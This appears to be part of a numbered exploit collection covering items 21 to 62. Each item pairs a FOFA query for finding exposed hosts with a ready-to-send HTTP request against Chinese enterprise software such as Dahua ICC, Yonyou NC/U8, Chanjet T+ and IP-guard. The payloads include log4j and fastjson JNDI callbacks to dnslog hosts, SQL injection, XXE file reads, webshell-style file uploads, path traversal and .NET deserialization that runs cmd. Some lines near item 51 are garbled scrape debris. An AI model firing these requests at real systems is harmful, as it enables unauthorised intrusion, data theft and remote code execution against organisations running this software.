GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

21. Dahua ICC intelligent IoT management platform random remote code execution
FOFA: icon_hash="-1935899595"

The body is the standard fastjson DNS-callback probe: it is deliberately not valid JSON (an object where a key should be, followed by a stray ""), and only fastjson's lenient parser accepts it. A DNS query to the callback host confirms the parser is fastjson with autotype reachable.

POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 161
Accept-Encoding: gzip
Connection: close
Content-Type: application/json;charset=utf-8

{
  "a":{
    "@type":"com.alibaba.fastjson.JSONObject",
    {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
  }""
}

22. Dahua ICC intelligent IoT management platform log4j remote code execution
FOFA: icon_hash="-1935899595"

The loginName value is passed to a Log4j logger that still performs JNDI lookups; replace dnslog with a host you control and watch for the DNS query.

POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Content-Type: application/json;charset=utf-8

{
  "loginName":"${jndi:ldap://dnslog}"
}

23. Dahua ICC intelligent IoT management platform fastjson remote code execution
FOFA: icon_hash="-1935899595"

Same endpoint and probe as item 21, with DNSLOG standing in for the callback host.

POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json;charset=utf-8
Accept-Encoding: gzip
Connection: close

{
  "a":{
    "@type":"com.alibaba.fastjson.JSONObject",
    {"@type":"java.net.URL","val":"http://DNSLOG"}
  }""
}

24. Yonyou (用友) NC 6.5 accept.jsp arbitrary file upload
FOFA: icon_hash="1085941792"

The fname field chooses the destination path, so a .txt part is written as a .jsp under the web root.

POST /aim/equipmap/accept.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 449
Accept: */*
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc

-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
Content-Type: text/plain

<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="fname"

\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--

25. Yonyou NC registerServlet JNDI remote code execution
FOFA:app="用友-UFIDA-NC"
POST /portal/registerServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
Content-Type: application/x-www-form-urlencoded

type=1&dsname=ldap://dnslog


26. Yonyou NC linkVoucher SQL injection
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


27. Yonyou NC showcontent SQL injection
FOFA:icon_hash="1085941792"
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: identity
Connection: close
Content-Type: text/xml; charset=utf-8


28. Yonyou NC grouptemplet arbitrary file upload
FOFA:icon_hash="1085941792"
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Connection: close
Content-Length: 268
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Accept-Encoding: gzip

------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
Content-Type: application/octet-stream

<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--

/uapim/static/pages/nc/head.jsp


29. Yonyou NC down/bill SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


30. Yonyou NC importPml SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Connection: close

------WebKitFormBoundaryH970hbttBhoCyj9V
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
Content-Type: image/jpeg

------WebKitFormBoundaryH970hbttBhoCyj9V--


31. Yonyou NC runStateServlet SQL injection
version<=6.5
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded


32. Yonyou NC complainbilldetail SQL injection
version: NC633, NC65
FOFA:app="用友-UFIDA-NC"
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


33. Yonyou NC downTax/download SQL injection
version: NC6.5
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


34. Yonyou NC warningDetailInfo interface SQL injection
FOFA:app="用友-UFIDA-NC"
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


35. Yonyou NC-Cloud importhttpscer arbitrary file upload
FOFA:app="用友-NC-Cloud"
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
Host: 203.25.218.166:8888
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
Content-Length: 190
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0

--fd28cb44e829ed1c197ec3bc71748df0
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"

<%out.println(1111*1111);%>
--fd28cb44e829ed1c197ec3bc71748df0--


36. Yonyou NC-Cloud soapFormat XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/soapFormat.ajax HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Content-Length: 263
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1

msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a


37. Yonyou NC-Cloud IUpdateService XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Content-Length: 421
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: text/xml;charset=UTF-8
SOAPAction: urn:getResult
Upgrade-Insecure-Requests: 1

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
  <soapenv:Header/>
  <soapenv:Body>
    <iup:getResult>
      <!--type: string-->
      <iup:string><![CDATA[
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
<xxx/>]]></iup:string>
    </iup:getResult>
  </soapenv:Body>
</soapenv:Envelope>


38. Yonyou U8 Cloud smartweb2.RPC.d XXE
FOFA:app="用友-U8-Cloud"
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
Host: 192.168.40.131:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
Content-Length: 260
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p></vps></rpc>


39. Yonyou U8 Cloud RegisterServlet SQL injection
FOFA:title="u8c"
POST /servlet/RegisterServlet HTTP/1.1
Host: 192.168.86.128:8089
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 85
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip

usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--


40. Yonyou U8-Cloud XChangeServlet XXE
FOFA:app="用友-U8-Cloud"
POST /service/XChangeServlet HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Content-Type: text/xml
Connection: close

<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a></r>


41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
FOFA:app="用友-U8-Cloud"
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json
Accept-Encoding: gzip
Connection: close


42. Yonyou GRP-U8 SmartUpload01 file upload
FOFA:app="用友-GRP-U8"
POST /u8qx/SmartUpload01.jsp HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36

PAYLOAD

http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml


43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
FOFA:app="用友-GRP-U8"
POST /services/userInfoWeb HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
SOAPAction:
Content-Type: text/xml;charset=UTF-8

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
  <soapenv:Header/>
  <soapenv:Body>
    <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
      <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
    </ser:getUserNameById>
  </soapenv:Body>
</soapenv:Envelope>


44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


45. Yonyou GRP-U8 ufgovbank XXE
FOFA:app="用友-GRP-U8"
POST /ufgovbank HTTP/1.1
Host: 192.168.40.130:222
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Connection: close
Content-Length: 161
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

reqData=<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest


46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


47. Yonyou GRP A++Cloud government finance cloud arbitrary file read
FOFA:body="/pf/portal/login/css/fonts/style.css"
GET /ma/emp/maEmp/download?fileName=../../../etc/passwd HTTP/1.1
Host: x.x.x.x
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
Connection: close


48. Yonyou U8 CRM swfupload arbitrary file upload
FOFA:title="用友U8CRM"
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855

------269520967239406871642430066855
Content-Disposition: form-data; name="file"; filename="s.php"
Content-Type: application/octet-stream

123
------269520967239406871642430066855
Content-Disposition: form-data; name="upload"

upload
------269520967239406871642430066855--


49. Yonyou U8 CRM uploadfile.php interface arbitrary file upload
FOFA:body="用友U8CRM"
POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Content-Length: 329
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w

-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="file"; filename="%s.php "
Content-Type: application/octet-stream

wersqqmlumloqa
-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="upload"

upload
-----------------------------vvv3wdayqv3yppdxvn3w--

http://x.x.x.x/tmpfile/updB3CB.tmp.php


50. QDocs Smart School 6.4.1 filterRecords SQL injection
FOFA:body="close closebtnmodal"
POST /course/filterRecords/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 224
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1


: ~' G: s. N) p51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入
( S% U/ U) Q; j+ FFOFA:app="云时空社会化商业ERP系统"
9 T6 p$ p$ \0 v V, ^7 \" C7 CGET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
# g/ D" S4 O2 u& h8 u7 X6 nHost: your-ip
' t5 g' s$ J/ V6 W3 }User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36( t. h" p1 j8 ~) k
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
( V, P' k0 i% N7 ~* N! I5 J, d$ wAccept-Encoding: gzip, deflate
2 n r; E) c: O7 OAccept-Language: zh-CN,zh;q=0.93 M, }* X7 G, h) C8 ?' ?; n3 F
Connection: close
' w5 F% E& \7 e/ Q$ v
/ K& R+ Q, D" J/ z/ F9 h: S4 E1 e( j
52. Weaver E-Office json_common.php SQL injection
FOFA:app="泛微-EOffice"
POST /building/json_common.php HTTP/1.1
Host: 192.168.86.128:8097
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Content-Length: 87
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333


53. DPtech VPN Service arbitrary file upload
FOFA:app="DPtech-SSLVPN"
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd


54. Chanjet T+ getstorewarehousebystore remote code execution
FOFA:app="畅捷通-TPlus"
Step 1: send the request below to the target; it executes a command that writes the specified string into the specified file:
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"

Full request:
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
Content-Length: 593

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo":{
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd",
        "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
      }
    }
  }
}

Step 2: request the following URL:
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt


55. Chanjet T+ getdecallusers information disclosure
FOFA:app="畅捷通-TPlus"
Step 1: obtain a Cookie through the
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword interface.
Step 2: using the obtained Cookie, request
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers


56. Chanjet T+ RRATableController,Ufida.T.DI.UIP.ashx deserialization RCE
FOFA: app="畅捷通-TPlus"
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/json

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo": {
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd",
        "Arguments":"/c ping 6qevyvmi.dnslog.pw"
      }
    }
  }
}


57. Chanjet T+ keyEdit.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close


58. Chanjet T+ KeyInfoList.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close


59. XETUX software dynamiccontent.properties.xhtml remote code execution
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
Host: 192.168.86.128:9090
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Content-Length: 1669
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

PAYLOAD


60. 百卓Smart管理平台 importexport.php SQL injection
FOFA:title="Smart管理平台"
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

61. 浙大恩特客户资源管理系统 fileupload arbitrary file upload
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 27
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

8uxssX66eqrqtKObcVa0kid98xa

62. IP-guard WebServer remote command execution
FOFA:"IP-guard" && icon_hash="2030860561"
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
